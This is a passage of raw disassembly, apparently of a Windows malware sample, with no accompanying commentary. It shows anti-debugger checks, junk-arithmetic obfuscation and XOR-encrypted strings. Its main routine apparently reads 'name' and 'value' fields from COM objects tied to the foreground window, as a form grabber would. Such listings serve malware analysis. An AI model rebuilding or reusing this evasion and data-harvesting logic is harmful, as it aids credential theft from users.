jz short loc_406C79
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406C79: ; CODE XREF: sub_406A40+22C�j
mov [ebp+var_30], 48A1h
add [ebp+var_30], 7310h
inc [ebp+var_4]
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb loc_406BA8
and dword_442370, 0
loc_406C9D: ; CODE XREF: sub_406A40+3C�j
; sub_406A40+100�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406A40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_406CA2(void *Src, size_t Size)
sub_406CA2 proc near ; CODE XREF: sub_406D2E+5E1�p
; sub_406D2E+62A�p ...
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_4423AC
lea eax, ds:431C50h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_4], 0D2h
xor edi, edi
jmp short loc_406CE9
; ---------------------------------------------------------------------------
loc_406CCF: ; CODE XREF: sub_406CA2+49�j
mov eax, dword_4423AC
add eax, edi
lea eax, ds:431C50h[eax]
movsx edx, byte ptr [eax]
xor edx, 0FDh
mov [eax], dl
inc edi
loc_406CE9: ; CODE XREF: sub_406CA2+2B�j
cmp edi, esi
jl short loc_406CCF
mov eax, dword_4423AC
add eax, esi
mov byte ptr dword_431C50[eax], 0
mov edi, dword_4423AC
add dword_4423AC, 3
mov eax, dword_4423AC
inc eax
add eax, esi
mov dword_4423AC, eax
cmp eax, 0DC5h
jle short loc_406D24
and dword_4423AC, 0
loc_406D24: ; CODE XREF: sub_406CA2+79�j
lea eax, dword_431C50[edi]
pop edi
pop esi
leave
retn
sub_406CA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D2E proc near ; CODE XREF: StartAddress+69�p
var_6381D = byte ptr -6381Dh
var_6381C = byte ptr -6381Ch
var_63816 = word ptr -63816h
var_63814 = dword ptr -63814h
var_6380F = byte ptr -6380Fh
var_62810 = dword ptr -62810h
var_6280C = dword ptr -6280Ch
var_62808 = word ptr -62808h
var_62806 = word ptr -62806h
var_62804 = dword ptr -62804h
var_62800 = word ptr -62800h
var_627F8 = dword ptr -627F8h
var_627F0 = word ptr -627F0h
var_627E8 = dword ptr -627E8h
var_627E0 = dword ptr -627E0h
var_627DC = dword ptr -627DCh
var_627D8 = dword ptr -627D8h
var_627D4 = byte ptr -627D4h
var_627D3 = byte ptr -627D3h
var_627CC = word ptr -627CCh
var_627CA = byte ptr -627CAh
var_627C4 = byte ptr -627C4h
var_627BF = byte ptr -627BFh
var_627BC = word ptr -627BCh
var_627BA = byte ptr -627BAh
var_627B9 = byte ptr -627B9h
var_627B8 = dword ptr -627B8h
Source = byte ptr -627B3h
var_626B4 = dword ptr -626B4h
var_626B0 = dword ptr -626B0h
var_626AC = dword ptr -626ACh
var_626A8 = word ptr -626A8h
var_626A0 = dword ptr -626A0h
var_62694 = dword ptr -62694h
var_62690 = dword ptr -62690h
var_6268C = dword ptr -6268Ch
var_62688 = dword ptr -62688h
var_62684 = dword ptr -62684h
var_62680 = dword ptr -62680h
var_6267C = dword ptr -6267Ch
MultiByteStr = byte ptr -62677h
var_62674 = dword ptr -62674h
var_6266D = byte ptr -6266Dh
var_5269E = byte ptr -5269Eh
var_5269A = word ptr -5269Ah
var_52698 = dword ptr -52698h
var_52694 = dword ptr -52694h
var_52690 = byte ptr -52690h
var_52688 = dword ptr -52688h
var_52680 = word ptr -52680h
var_52678 = dword ptr -52678h
var_52674 = dword ptr -52674h
var_5266F = byte ptr -5266Fh
var_5266E = byte ptr -5266Eh
var_5266D = byte ptr -5266Dh
var_52667 = dword ptr -52667h
var_52663 = byte ptr -52663h
var_5265D = byte ptr -5265Dh
var_52657 = byte ptr -52657h
var_52656 = byte ptr -52656h
var_52653 = byte ptr -52653h
var_5264E = dword ptr -5264Eh
var_52649 = byte ptr -52649h
var_52644 = dword ptr -52644h
var_52640 = dword ptr -52640h
lpWideCharStr = dword ptr -5263Ch
ppv = dword ptr -52638h
var_5262D = byte ptr -5262Dh
var_5262C = dword ptr -5262Ch
var_52626 = word ptr -52626h
var_52624 = word ptr -52624h
var_52622 = word ptr -52622h
var_5261F = byte ptr -5261Fh
var_5261E = byte ptr -5261Eh
var_5261D = byte ptr -5261Dh
var_5261C = dword ptr -5261Ch
var_52618 = dword ptr -52618h
var_52614 = dword ptr -52614h
var_52610 = dword ptr -52610h
var_52609 = byte ptr -52609h
var_52608 = dword ptr -52608h
var_52604 = dword ptr -52604h
var_525FE = word ptr -525FEh
var_525FC = dword ptr -525FCh
var_525F6 = word ptr -525F6h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
Dest = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 63820h
call sub_40C6B8
push ebx
push esi
push edi
mov [ebp+var_525F6], 7310h
movzx eax, [ebp+var_525F6]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_525F6], ax
push offset psz ; "value"
call SysAllocString
mov [ebp+var_10FA8], eax
push offset aName ; "name"
call SysAllocString
mov [ebp+var_10FAC], eax
lea eax, [ebp+ppv]
push eax ; ppv
call sub_40696D
pop ecx
or eax, eax
jz loc_407E44
call GetLastError
loc_406D95: ; CODE XREF: sub_406D2E+9A�j
; sub_406D2E+CB�j ...
push 0 ; Duration
call _sleep ; _sleep
call IsDebuggerPresent ; IsDebuggerPresent
call GetForegroundWindow ; GetForegroundWindow
mov [ebp+var_52614], eax
push eax ; hWnd
lea eax, [ebp+ppv]
push eax ; int
call sub_406A40
add esp, 0Ch
call GetTickCount ; GetTickCount
cmp dword_442370, 0
jz short loc_406D95
mov [ebp+var_52618], 4FCAh
sub [ebp+var_52618], 3B66h
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
call IsDebuggerPresent ; IsDebuggerPresent
or ebx, ebx
jnz short loc_406D95
lea eax, [ebp+var_525FC]
push eax
push offset loc_447ACC
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_5261C], 7776h
add [ebp+var_5261C], 6412h
or ebx, ebx
jnz loc_407E25
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+lpWideCharStr]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov [ebp+var_5261D], 4
add [ebp+var_5261D], 1
or ebx, ebx
jnz loc_407E02
push offset MultiByteStr ; lpMultiByteStr
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_52644], edi
mov eax, [ebp+var_52614]
mov dword_42FB14, eax
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_5261E], 74h
add [ebp+var_5261E], 1
or ebx, ebx
jnz loc_407E02
cmp [ebp+var_525FE], 0
jnz loc_407E02
lea edi, [ebp+var_52649]
lea esi, word_4423B6
mov ecx, 5
rep movsb
mov eax, dword_4423BB
mov [ebp+var_5264E+1], eax
mov [ebp+Dest], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52604]
push eax
mov eax, [ebp+var_525FC]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov [ebp+var_5261F], 10h
movzx eax, [ebp+var_5261F]
imul eax, 7B1Bh
mov [ebp+var_5261F], al
or ebx, ebx
jnz loc_407E02
lea edi, [ebp+var_52653]
lea esi, byte_4423BF
mov ecx, 3
rep movsw
lea eax, [ebp+var_52640]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call GetTickCount ; GetTickCount
or ebx, ebx
jnz loc_407DED
call IsDebuggerPresent ; IsDebuggerPresent
or [ebp+var_524CC], 0FFFFFFFFh
loc_406F67: ; CODE XREF: sub_406D2E+B83�j
mov [ebp+var_52622], 1C5h
add [ebp+var_52622], 47D9h
and [ebp+var_52608], 0
and [ebp+var_52610], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_406FD3
call GetLastError
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525FC]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
lea edi, [ebp+var_52678+1]
lea esi, byte_4423C5
movsd
movsd
or ebx, ebx
jnz loc_40789F
mov [ebp+var_5266F], 40h
add [ebp+var_5266F], 3Ch
jmp loc_407112
; ---------------------------------------------------------------------------
loc_406FD3: ; CODE XREF: sub_406D2E+260�j
call GetCurrentProcessId ; GetCurrentProcessId
mov [ebp+var_52680], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52678], eax
lea eax, [ebp+var_52690]
push eax
lea eax, [ebp+var_52680]
push eax
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
call GetVersion ; GetVersion
lea eax, [ebp+var_52608]
push eax
push (offset loc_447AF8+4)
mov eax, [ebp+var_52688]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_4423CD
mov [ebp+var_52694], eax
or ebx, ebx
jnz loc_40789F
mov [ebp+var_5266F], 2Eh
movzx eax, [ebp+var_5266F]
imul eax, 392Ch
mov [ebp+var_5266F], al
lea eax, [ebp+var_52610]
push eax
mov eax, [ebp+var_52608]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
call GetLastError
or ebx, ebx
jz short loc_4070AB
call GetProcessHeap ; GetProcessHeap
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_5269A], 1EB8h
movzx eax, [ebp+var_5269A]
imul eax, 4A7Ch
mov [ebp+var_5269A], ax
jmp loc_40789F
; ---------------------------------------------------------------------------
loc_4070AB: ; CODE XREF: sub_406D2E+348�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_52610]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_4423D1
mov [ebp+var_52698], eax
or ebx, ebx
jz short loc_407112
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, [ebp+var_52610]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov byte ptr [ebp+var_5269A+1], 67h
sub byte ptr [ebp+var_5269A+1], 4Ah
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea edi, [ebp+var_5269E]
lea esi, a4yk3 ; "4Yk3"
mov ecx, 5
rep movsb
jmp loc_40789F
; ---------------------------------------------------------------------------
loc_407112: ; CODE XREF: sub_406D2E+2A0�j
; sub_406D2E+39F�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
call GetLastError
or ebx, ebx
jnz loc_407D88
mov [ebp+var_52609], 0Ah
movzx eax, [ebp+var_52609]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52609], al
and [ebp+var_21784], 0
jmp loc_40788D
; ---------------------------------------------------------------------------
loc_40715A: ; CODE XREF: sub_406D2E+B6B�j
call GetCurrentThreadId ; GetCurrentThreadId
push 0 ; Duration
call _sleep ; _sleep
pop ecx
call GetTickCount ; GetTickCount
mov [ebp+var_626A8], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626A0], eax
lea eax, [ebp+var_62694]
push eax
lea esi, [ebp+var_626A8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626A8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
lea edi, [ebp+var_627BF]
lea esi, aB ; "~"
mov ecx, 3
rep movsb
or ebx, ebx
jnz loc_407887
lea edi, [ebp+var_627C4]
lea esi, aZrsh ; "ZRSH"
mov ecx, 5
rep movsb
and [ebp+var_626AC], 0
lea eax, [ebp+var_626AC]
push eax
push (offset loc_447ADB+1)
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_626B0], 4352h
mov eax, [ebp+var_626B0]
mov edx, eax
add edx, eax
mov [ebp+var_626B0], edx
or ebx, ebx
jnz loc_407585
lea eax, [ebp+var_626B4]
push eax
mov eax, [ebp+var_626AC]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
lea edi, [ebp+var_627CA]
lea esi, aTxnve ; "TxN‚e"
mov ecx, 3
rep movsw
or ebx, ebx
jnz loc_407585
mov ax, word_4423E8
mov [ebp+var_627CC], ax
lea edi, [ebp+var_627D3]
lea esi, word_4423EA
mov ecx, 7
rep movsb
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push [ebp+var_626B4] ; lpWideCharStr
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6268C], edi
call GetLastError
and [ebp+var_52674], 0
jmp short loc_4072D8
; ---------------------------------------------------------------------------
loc_4072AF: ; CODE XREF: sub_406D2E+5B6�j
mov eax, [ebp+var_52674]
mov al, [ebp+eax+MultiByteStr]
cmp al, 0Dh
jz short loc_4072C4
cmp al, 0Ah
jnz short loc_4072D2
loc_4072C4: ; CODE XREF: sub_406D2E+590�j
mov eax, [ebp+var_52674]
mov [ebp+eax+MultiByteStr], 0
loc_4072D2: ; CODE XREF: sub_406D2E+594�j
inc [ebp+var_52674]
loc_4072D8: ; CODE XREF: sub_406D2E+57F�j
mov eax, [ebp+var_6268C]
cmp [ebp+var_52674], eax
jb short loc_4072AF
call GetVersion ; GetVersion
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_40733F
lea edi, [ebp+var_627DC+3]
lea esi, byte_4423F1
mov ecx, 3
rep movsw
push 11h ; Size
push offset aNPVE ; "Á°¼´³ºÐ»²¯°¢Ø¥ÃÝ"
call sub_406CA2
push [ebp+var_21784]
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
add esp, 1Ch
jmp short loc_4073AB
; ---------------------------------------------------------------------------
loc_40733F: ; CODE XREF: sub_406D2E+5C4�j
mov word ptr [ebp+var_627D8+2], 41D1h
add word ptr [ebp+var_627D8+2], 3FCCh
push 13h ; Size
push offset aPVEPVE ; "Á»¯¼°¸¢Ø¥Ð»²¯°¢Ø¥ÃÝ"
call sub_406CA2
push [ebp+var_21784]
push [ebp+var_524CC]
push eax ; Format
lea edi, [ebp+Source]
push edi ; Dest
call sprintf ; sprintf
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
add esp, 20h
mov [ebp+var_627D4], 0C9h
movzx eax, [ebp+var_627D4]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_627D4], al
loc_4073AB: ; CODE XREF: sub_406D2E+60F�j
and [ebp+var_52674], 0
loc_4073B2: ; CODE XREF: sub_406D2E+731�j
mov eax, [ebp+var_52674]
lea ecx, [ebp+eax+MultiByteStr]
or eax, 0FFFFFFFFh
loc_4073C2: ; CODE XREF: sub_406D2E+699�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4073C2
mov [ebp+var_62680], eax
cmp eax, 0
jz short loc_4073DB
cmp eax, 0C8h
jbe short loc_4073DD
loc_4073DB: ; CODE XREF: sub_406D2E+6A4�j
jmp short loc_407446
; ---------------------------------------------------------------------------
loc_4073DD: ; CODE XREF: sub_406D2E+6AB�j
cmp [ebp+var_62680], 1
jnz short loc_4073F6
mov eax, [ebp+var_52674]
cmp [ebp+eax+MultiByteStr], 20h
jz short loc_407446
loc_4073F6: ; CODE XREF: sub_406D2E+6B6�j
call GetCurrentThreadId ; GetCurrentThreadId
push 1 ; Size
push offset byte_446ED4 ; Src
call sub_406CA2
push eax ; Source
lea edi, [ebp+Dest]
push edi ; Dest
call strcat ; strcat
call GetProcessHeap ; GetProcessHeap
mov eax, [ebp+var_52674]
lea eax, [ebp+eax+MultiByteStr]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call strcat ; strcat
add esp, 18h
mov [ebp+var_627B8], 60E9h
inc [ebp+var_627B8]
loc_407446: ; CODE XREF: sub_406D2E:loc_4073DB�j
; sub_406D2E+6C6�j
mov eax, [ebp+var_62680]
inc eax
add [ebp+var_52674], eax
mov eax, [ebp+var_6268C]
cmp [ebp+var_52674], eax
jb loc_4073B2
mov [ebp+var_627B9], 0B2h
movzx eax, [ebp+var_627B9]
imul eax, 2A9Dh
mov [ebp+var_627B9], al
and [ebp+var_62688], 0
lea ecx, [ebp+Dest]
or eax, 0FFFFFFFFh
loc_40748F: ; CODE XREF: sub_406D2E+766�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40748F
mov [ebp+var_62680], eax
mov [ebp+var_52674], 0
jmp loc_407565
; ---------------------------------------------------------------------------
loc_4074AB: ; CODE XREF: sub_406D2E+843�j
mov word ptr [ebp+var_627D8+2], 6673h
movzx eax, word ptr [ebp+var_627D8+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_627D8+2], ax
mov eax, [ebp+var_52674]
cmp [ebp+eax+Dest], 20h
jz short loc_4074DF
and [ebp+var_6267C], 0
loc_4074DF: ; CODE XREF: sub_406D2E+7A8�j
mov word ptr [ebp+var_627D8], 5E3Bh
add word ptr [ebp+var_627D8], 7D94h
cmp [ebp+var_6267C], 0
jnz short loc_407540
mov [ebp+var_627DC], 7B77h
mov eax, 51B3h
mul [ebp+var_627DC]
mov [ebp+var_627E0], eax
mov [ebp+var_627DC], eax
mov eax, [ebp+var_62688]
mov edx, [ebp+var_52674]
mov dl, [ebp+edx+Dest]
mov [ebp+eax+Dest], dl
call IsDebuggerPresent ; IsDebuggerPresent
inc [ebp+var_62688]
loc_407540: ; CODE XREF: sub_406D2E+7CA�j
mov eax, [ebp+var_52674]
cmp [ebp+eax+Dest], 20h
jnz short loc_40755A
mov [ebp+var_6267C], 1
loc_40755A: ; CODE XREF: sub_406D2E+820�j
call IsDebuggerPresent ; IsDebuggerPresent
inc [ebp+var_52674]
loc_407565: ; CODE XREF: sub_406D2E+778�j
mov eax, [ebp+var_62680]
cmp [ebp+var_52674], eax
jb loc_4074AB
mov eax, [ebp+var_62688]
mov [ebp+eax+Dest], 0
loc_407585: ; CODE XREF: sub_406D2E+4FB�j
; sub_406D2E+52F�j
and [ebp+var_62684], 0
lea eax, [ebp+var_62684]
push eax
push (offset loc_447AE8+4)
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call GetTickCount ; GetTickCount
or ebx, ebx
jnz loc_407855
call GetProcessHeap ; GetProcessHeap
lea eax, [ebp+var_62690]
push eax
mov eax, [ebp+var_62684]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
or ebx, ebx
jnz loc_407832
and [ebp+var_52678], 0
jmp loc_407819
; ---------------------------------------------------------------------------
loc_4075E5: ; CODE XREF: sub_406D2E+AF7�j
call GetProcessHeap ; GetProcessHeap
push 0 ; Duration
call _sleep ; _sleep
pop ecx
mov [ebp+var_627F0], 2
mov eax, [ebp+var_52678]
mov [ebp+var_627E8], eax
lea eax, [ebp+var_627DC]
push eax
lea esi, [ebp+var_627F0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_627F0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_62684]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
or ebx, ebx
jnz loc_407813
call GetProcessHeap ; GetProcessHeap
and [ebp+var_627D8], 0
lea eax, [ebp+var_627D8]
push eax
push (offset loc_447ADB+1)
mov eax, [ebp+var_627DC]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call GetLastError
or ebx, ebx
jnz loc_4077E1
mov [ebp+var_62804], 1DE4h
sub [ebp+var_62804], 0BA1h
cmp [ebp+var_627D8], 0
jz loc_4077E1
mov [ebp+var_62806], 1B0Fh
sub [ebp+var_62806], 4876h
lea eax, [ebp+var_62800]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_627D8]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call GetCurrentProcessId ; GetCurrentProcessId
or ebx, ebx
jnz loc_4077E1
mov eax, dword_4423F7
mov [ebp+var_62810], eax
cmp [ebp+var_62800], 8
jnz loc_4077E1
movzx edi, [ebp+var_2]
mov esi, [ebp+var_627D8]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52678]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62800]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_627D8]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_62808], 3C9Dh
movzx eax, [ebp+var_62808]
imul eax, 22A9h
mov [ebp+var_62808], ax
or ebx, ebx
jnz loc_4077DD
call GetLastError
mov ax, word_4423FB
mov [ebp+var_63816], ax
lea edi, [ebp+var_6381C]
lea esi, byte_4423FD
mov ecx, 3
rep movsw
lea eax, [ebp+var_6380F]
push eax ; lpMultiByteStr
push [ebp+var_627F8] ; lpWideCharStr
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_63814], edi
call GetLastError
cmp [ebp+var_6380F], 0
jz short loc_4077CC
cmp edi, 64h
jnb short loc_4077CC
lea eax, [ebp+var_6380F]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C6D8
loc_4077CC: ; CODE XREF: sub_406D2E+A7C�j
; sub_406D2E+A81�j
lea edi, [ebp+var_6381D]
lea esi, byte_442403
xor ecx, ecx
inc ecx
rep movsb
loc_4077DD: ; CODE XREF: sub_406D2E+A26�j
inc [ebp+var_2]
loc_4077E1: ; CODE XREF: sub_406D2E+94B�j
; sub_406D2E+96C�j ...
cmp [ebp+var_627D8], 0
jz short $+2
mov [ebp+var_6280C], 346Bh
sub [ebp+var_6280C], 3A2Ah
cmp [ebp+var_627DC], 0
jz short loc_407813
mov eax, [ebp+var_627DC]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407813: ; CODE XREF: sub_406D2E+914�j
; sub_406D2E+AD7�j
inc [ebp+var_52678]
loc_407819: ; CODE XREF: sub_406D2E+8B2�j
mov eax, [ebp+var_62690]
cmp [ebp+var_52678], eax
jb loc_4075E5
jmp short loc_407887
; ---------------------------------------------------------------------------
call GetCurrentProcessId ; GetCurrentProcessId
loc_407832: ; CODE XREF: sub_406D2E+8A5�j
cmp [ebp+var_62684], 0
jz short loc_407847
mov eax, [ebp+var_62684]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407847: ; CODE XREF: sub_406D2E+B0B�j
mov [ebp+var_627BA], 0F2h
sub [ebp+var_627BA], 5Dh
loc_407855: ; CODE XREF: sub_406D2E+883�j
cmp [ebp+var_62694], 0
jz short loc_40786A
mov eax, [ebp+var_62694]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_40786A: ; CODE XREF: sub_406D2E+B2E�j
mov [ebp+var_627BC], 143Bh
movzx eax, [ebp+var_627BC]
imul eax, 22Eh
mov [ebp+var_627BC], ax
loc_407887: ; CODE XREF: sub_406D2E+4A1�j
; sub_406D2E+AFD�j
inc [ebp+var_21784]
loc_40788D: ; CODE XREF: sub_406D2E+427�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_40715A
loc_40789F: ; CODE XREF: sub_406D2E+28C�j
; sub_406D2E+309�j ...
inc [ebp+var_524CC]
mov eax, [ebp+var_52640]
cmp [ebp+var_524CC], eax
jl loc_406F67
lea edi, [ebp+var_52656]
lea esi, byte_442404
mov ecx, 3
rep movsb
loc_4078CA: ; CODE XREF: sub_406D2E+D09�j
push 0 ; Duration
call _sleep ; _sleep
pop ecx
call GetTickCount ; GetTickCount
mov [ebp+var_21786], 0
jmp loc_4079DF
; ---------------------------------------------------------------------------
loc_4078E5: ; CODE XREF: sub_406D2E+CBE�j
mov [ebp+var_62674], 78C0h
sub [ebp+var_62674], 6288h
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov dword ptr [ebp-62678h], 2EABh
mov eax, 693Bh
mul dword ptr [ebp-62678h]
mov [ebp+var_62690], eax
mov [ebp-62678h], eax
or ebx, ebx
jnz loc_4079D8
lea edi, [ebp+var_62688+3]
lea esi, byte_442407
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_442408
mov [ebp+var_6268C+3], eax
lea eax, [ebp+var_6266D]
push eax ; lpMultiByteStr
push [ebp+var_524D8] ; lpWideCharStr
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_62684], edi
mov [ebp+var_6267C], 17FCh
inc [ebp+var_6267C]
cmp [ebp+var_6266D], 0
jz short loc_4079D8
mov word ptr [ebp+var_62680+2], 2AD9h
sub word ptr [ebp+var_62680+2], 258Eh
cmp [ebp+var_62684], 64h
jnb short loc_4079D3
lea eax, [ebp+var_6266D]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C6D8
loc_4079D3: ; CODE XREF: sub_406D2E+C85�j
call GetTickCount ; GetTickCount
loc_4079D8: ; CODE XREF: sub_406D2E+C13�j
; sub_406D2E+C6A�j
inc [ebp+var_21786]
loc_4079DF: ; CODE XREF: sub_406D2E+BB2�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_4078E5
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_52624], 370Ah
inc [ebp+var_52624]
or ebx, ebx
jnz loc_407E02
lea edi, [ebp+var_52657]
lea esi, byte_44240C
xor ecx, ecx
inc ecx
rep movsb
cmp [ebp+var_525FE], 0
jz loc_4078CA
call GetCurrentProcessId ; GetCurrentProcessId
lea edi, [ebp+var_5265D]
lea esi, a1o8qz ; "1o8QZ"
mov ecx, 3
rep movsw
mov [ebp+var_2177D], 0
push offset MultiByteStr
lea eax, [ebp+var_2177D]
push eax
call sub_40C6D8
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407B63
; ---------------------------------------------------------------------------
loc_407A86: ; CODE XREF: sub_406D2E+E42�j
call GetTickCount ; GetTickCount
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407B5C
call GetCurrentProcessId ; GetCurrentProcessId
and [ebp+var_525E8], 0
push 4 ; Size
push offset byte_446ECF ; Src
call sub_406CA2
movzx edi, [ebp+var_1177E]
push edi
push eax ; Format
lea edi, [ebp+var_525DF]
push edi ; Dest
call sprintf ; sprintf
lea eax, [ebp+var_525DF]
push eax ; Source
lea eax, [ebp+var_2177D]
push eax ; Dest
call strcat ; strcat
lea edi, [ebp+var_52674]
lea esi, aKbX0 ; "k*x0"
mov ecx, 3
rep movsw
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax ; Source
lea eax, [ebp+var_2177D]
push eax ; Dest
call strcat ; strcat
push 1 ; Size
push offset byte_446ECD ; Src
call sub_406CA2
push eax ; Source
lea edi, [ebp+var_2177D]
push edi ; Dest
call strcat ; strcat
mov ax, word_442419
mov word ptr [ebp+var_52678+2], ax
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax ; Source
lea eax, [ebp+var_2177D]
push eax ; Dest
call strcat ; strcat
add esp, 3Ch
loc_407B5C: ; CODE XREF: sub_406D2E+D6F�j
inc [ebp+var_1177E]
loc_407B63: ; CODE XREF: sub_406D2E+D53�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407A86
cmp [ebp+var_525E8], 0
jnz loc_407D88
lea edi, [ebp+var_52663]
lea esi, byte_44241B
mov ecx, 3
rep movsw
push 1 ; Size
push offset byte_446ECB ; Src
call sub_406CA2
push eax ; Source
lea edi, [ebp+var_2177D]
push edi ; Dest
call strcat ; strcat
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+Dest]
push eax ; Source
lea eax, [ebp+var_2177D]
push eax ; Dest
